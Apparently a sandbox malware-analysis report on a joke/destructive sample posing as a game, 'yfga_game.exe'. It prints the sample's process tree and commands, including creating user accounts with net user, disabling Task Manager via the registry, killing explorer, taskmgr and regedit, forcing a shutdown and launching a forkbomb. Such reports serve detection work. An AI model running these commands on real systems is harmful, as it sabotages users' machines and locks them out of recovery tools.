3960	@[email protected]
2208	@[email protected]
2172	@[email protected]
2776	@[email protected]
2504	@[email protected]
1608	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

yfga_game.exeYouAreAnIdiot.exeYouAreAnIdiot.exeYouAreAnIdiot.execmd.exenet.exenet.exe

description	pid	process	target process
PID 2276 wrote to memory of 2592	2276	yfga_game.exe	cmd.exe
PID 2276 wrote to memory of 2592	2276	yfga_game.exe	cmd.exe
PID 2276 wrote to memory of 2592	2276	yfga_game.exe	cmd.exe
PID 2276 wrote to memory of 2592	2276	yfga_game.exe	cmd.exe
PID 2144 wrote to memory of 1700	2144	YouAreAnIdiot.exe	WerFault.exe
PID 2144 wrote to memory of 1700	2144	YouAreAnIdiot.exe	WerFault.exe
PID 2144 wrote to memory of 1700	2144	YouAreAnIdiot.exe	WerFault.exe
PID 2144 wrote to memory of 1700	2144	YouAreAnIdiot.exe	WerFault.exe
PID 1704 wrote to memory of 1484	1704	YouAreAnIdiot.exe	WerFault.exe
PID 1704 wrote to memory of 1484	1704	YouAreAnIdiot.exe	WerFault.exe
PID 1704 wrote to memory of 1484	1704	YouAreAnIdiot.exe	WerFault.exe
PID 1704 wrote to memory of 1484	1704	YouAreAnIdiot.exe	WerFault.exe
PID 1724 wrote to memory of 1316	1724	YouAreAnIdiot.exe	WerFault.exe
PID 1724 wrote to memory of 1316	1724	YouAreAnIdiot.exe	WerFault.exe
PID 1724 wrote to memory of 1316	1724	YouAreAnIdiot.exe	WerFault.exe
PID 1724 wrote to memory of 1316	1724	YouAreAnIdiot.exe	WerFault.exe
PID 2592 wrote to memory of 1232	2592	cmd.exe	NOTEPAD.EXE
PID 2592 wrote to memory of 1232	2592	cmd.exe	NOTEPAD.EXE
PID 2592 wrote to memory of 1232	2592	cmd.exe	NOTEPAD.EXE
PID 2592 wrote to memory of 1232	2592	cmd.exe	NOTEPAD.EXE
PID 2592 wrote to memory of 2220	2592	cmd.exe	net.exe
PID 2592 wrote to memory of 2220	2592	cmd.exe	net.exe
PID 2592 wrote to memory of 2220	2592	cmd.exe	net.exe
PID 2592 wrote to memory of 2220	2592	cmd.exe	net.exe
PID 2220 wrote to memory of 1932	2220	net.exe	net1.exe
PID 2220 wrote to memory of 1932	2220	net.exe	net1.exe
PID 2220 wrote to memory of 1932	2220	net.exe	net1.exe
PID 2220 wrote to memory of 1932	2220	net.exe	net1.exe
PID 2592 wrote to memory of 1584	2592	cmd.exe	reg.exe
PID 2592 wrote to memory of 1584	2592	cmd.exe	reg.exe
PID 2592 wrote to memory of 1584	2592	cmd.exe	reg.exe
PID 2592 wrote to memory of 1584	2592	cmd.exe	reg.exe
PID 2592 wrote to memory of 1480	2592	cmd.exe	screenscrew.exe
PID 2592 wrote to memory of 1480	2592	cmd.exe	screenscrew.exe
PID 2592 wrote to memory of 1480	2592	cmd.exe	screenscrew.exe
PID 2592 wrote to memory of 1480	2592	cmd.exe	screenscrew.exe
PID 2592 wrote to memory of 408	2592	cmd.exe	flasher.exe
PID 2592 wrote to memory of 408	2592	cmd.exe	flasher.exe
PID 2592 wrote to memory of 408	2592	cmd.exe	flasher.exe
PID 2592 wrote to memory of 408	2592	cmd.exe	flasher.exe
PID 2592 wrote to memory of 1280	2592	cmd.exe	calc.exe
PID 2592 wrote to memory of 1280	2592	cmd.exe	calc.exe
PID 2592 wrote to memory of 1280	2592	cmd.exe	calc.exe
PID 2592 wrote to memory of 1280	2592	cmd.exe	calc.exe
PID 2592 wrote to memory of 1208	2592	cmd.exe	cmd.exe
PID 2592 wrote to memory of 1208	2592	cmd.exe	cmd.exe
PID 2592 wrote to memory of 1208	2592	cmd.exe	cmd.exe
PID 2592 wrote to memory of 1208	2592	cmd.exe	cmd.exe
PID 2592 wrote to memory of 2492	2592	cmd.exe	walliant.exe
PID 2592 wrote to memory of 2492	2592	cmd.exe	walliant.exe
PID 2592 wrote to memory of 2492	2592	cmd.exe	walliant.exe
PID 2592 wrote to memory of 2492	2592	cmd.exe	walliant.exe
PID 2592 wrote to memory of 2492	2592	cmd.exe	walliant.exe
PID 2592 wrote to memory of 2492	2592	cmd.exe	walliant.exe
PID 2592 wrote to memory of 2492	2592	cmd.exe	walliant.exe
PID 2592 wrote to memory of 1320	2592	cmd.exe	net.exe
PID 2592 wrote to memory of 1320	2592	cmd.exe	net.exe
PID 2592 wrote to memory of 1320	2592	cmd.exe	net.exe
PID 2592 wrote to memory of 1320	2592	cmd.exe	net.exe
PID 1320 wrote to memory of 620	1320	net.exe	net1.exe
PID 1320 wrote to memory of 620	1320	net.exe	net1.exe
PID 1320 wrote to memory of 620	1320	net.exe	net1.exe
PID 1320 wrote to memory of 620	1320	net.exe	net1.exe
PID 2592 wrote to memory of 1808	2592	cmd.exe	reg.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

win7recovery.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	win7recovery.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	win7recovery.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 6 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

2024 attrib.exe
2072 attrib.exe
3564 attrib.exe
3352 attrib.exe
3752 attrib.exe
3608 attrib.exe

pid	process
2024	attrib.exe
2072	attrib.exe
3564	attrib.exe
3352	attrib.exe
3752	attrib.exe
3608	attrib.exe

C:\Users\Admin\AppData\Local\Temp\yfga_game.exe
"C:\Users\Admin\AppData\Local\Temp\yfga_game.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2276

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\YFGA.bat" "
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2592

C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\IMPORTANT.txt
3⤵
PID:1232

C:\Windows\SysWOW64\net.exe
net user "GO BACK!" "???" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:2220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "GO BACK!" "???" /add
4⤵
PID:1932

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskManager" /t REG_DWORD /d 1
3⤵
PID:1584

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\screenscrew.exe
screenscrew.exe
3⤵
- Executes dropped EXE
PID:1480

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\flasher.exe
flasher.exe
3⤵
- Executes dropped EXE
PID:408

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\calc.exe
calc.exe
3⤵
- Executes dropped EXE
PID:1280

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K hydra.cmd
3⤵
PID:1208

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\jokewarehydra.exe
jokewarehydra.exe
4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:1796

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy3.vbs"
4⤵
PID:2200

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\walliant.exe
walliant.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2492

C:\Users\Admin\AppData\Local\Temp\is-344P4.tmp\walliant.tmp
"C:\Users\Admin\AppData\Local\Temp\is-344P4.tmp\walliant.tmp" /SL5="$D022A,4511977,830464,C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\walliant.exe"
4⤵
- Executes dropped EXE
PID:920

C:\Windows\SysWOW64\net.exe
net user "FUCK OFF YFGA" "I DONT KNOW" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:1320

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "FUCK OFF YFGA" "I DONT KNOW" /add
4⤵
PID:620

C:\Windows\SysWOW64\reg.exe
reg import reg.reg
3⤵
- Sets desktop wallpaper using registry
PID:1808

C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\YouAreAnIdiot.exe
youareanidiot.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2296 -s 884
4⤵
- Loads dropped DLL
- Program crash
PID:380

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im fontdrvhost.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1100

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im TextInputhost.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im explorer.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2828

C:\Windows\SysWOW64\timeout.exe
timeout 5
3⤵
- Delays execution with timeout.exe
PID:1576

C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 30000 /c "HAHA I HACKED YOU AYFGA ROCKS YOU"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K spam.bat "forkbomb" /min
3⤵
PID:2816

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:3028

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2628

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:2164

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:916

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1052

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1036

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:1772

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:608

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1828

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2936

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:2392

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:2512

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:780

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:1876

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:1072

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1260

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1200

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:1380

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:900

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1820

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2728

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:2676

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:1440

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2628

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:2524

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:2264

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2884

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2152

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:1616

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:1692

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1804

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:352

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:1044

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1840

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1260

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:3016

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:2296

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2768

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2564

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:584

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:3000

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2124

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:2884

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:1856

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1108

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:760

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:568

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1592

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1824

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:2424

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:2940

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2588

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:692

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:332

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2440

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1316

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:1808

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:1952

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2380

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:1672

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:2188

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2588

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:1512

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:1316

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2496

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:2464

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:2284

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2672

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2920

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:1488

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:2100

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:560

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1256

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:2696

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:1312

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1220

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2788

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:2400

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:1200

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1820

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3044

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:2700

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:2724

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:560

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2872

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:1584

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:1664

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2168

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2920

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:1744

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:2920

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2924

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy2.vbs"
4⤵
PID:3124

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_dc152b52-85e4-4b09-861d-7d365833a691\annoy.vbs"
4⤵
PID:3228

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3252

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im regedit.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3332

